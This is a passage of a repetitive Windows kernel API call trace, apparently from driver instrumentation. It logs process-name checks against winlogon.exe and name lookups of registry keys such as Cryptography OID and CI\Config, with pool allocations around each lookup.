| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbee80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf2, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbee80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf0, ret_val_ptr_out = 0xffffe0003a763f10 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0xf0, ObjectNameInfo_unk_out = 0xffffe0003a763f10, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763f10, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91168e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91168e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x102, ret_val_ptr_out = 0xffffe0003a7664d0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91168e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91168e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91168e0, Length = 0x100, ObjectNameInfo_unk_out = 0xffffe0003af89f00, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91168e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91168e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x102, ret_val_ptr_out = 0xffffe0003a7664d0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91168e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91168e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91168e0, Length = 0x100, ObjectNameInfo_unk_out = 0xffffe0003af89f00, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91168e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91168e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x102, ret_val_ptr_out = 0xffffe0003a7664d0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91168e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91168e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91168e0, Length = 0x100, ObjectNameInfo_unk_out = 0xffffe0003af89f00, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbee80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf2, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbee80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf0, ret_val_ptr_out = 0xffffe0003a763f10 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0xf0, ObjectNameInfo_unk_out = 0xffffe0003a763f10, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763f10, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbf610, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbf610, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x84, ret_val_ptr_out = 0xffffe0003a77c910 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbf610, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbf610, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x82, ret_val_ptr_out = 0xffffe0003a77c870 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbf610, Length = 0x82, ObjectNameInfo_unk_out = 0xffffe0003a77c870, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\CI\Config, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\CI\Config | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a77c870, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a77c910, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91168e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91168e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x102, ret_val_ptr_out = 0xffffe0003a7664d0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91168e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91168e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91168e0, Length = 0x100, ObjectNameInfo_unk_out = 0xffffe0003af89f00, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba1f8de0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba1f8de0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x94, ret_val_ptr_out = 0xffffe0003af83ef0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba1f8de0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba1f8de0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x92, ret_val_ptr_out = 0xffffe0003af95f60 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba1f8de0, Length = 0x92, ObjectNameInfo_unk_out = 0xffffe0003af95f60, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\CI\Config\Default, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\CI\Config\Default | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af95f60, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af83ef0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbee80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf2, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbee80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf0, ret_val_ptr_out = 0xffffe0003a763e10 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0xf0, ObjectNameInfo_unk_out = 0xffffe0003a763e10, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763e10, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbee80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf2, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbee80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf0, ret_val_ptr_out = 0xffffe0003a763e10 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0xf0, ObjectNameInfo_unk_out = 0xffffe0003a763e10, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763e10, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91168e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91168e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x102, ret_val_ptr_out = 0xffffe0003a7664d0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91168e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91168e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91168e0, Length = 0x100, ObjectNameInfo_unk_out = 0xffffe0003af89f00, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91168e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91168e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x102, ret_val_ptr_out = 0xffffe0003a7664d0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91168e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91168e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0xc0000004 | ||||
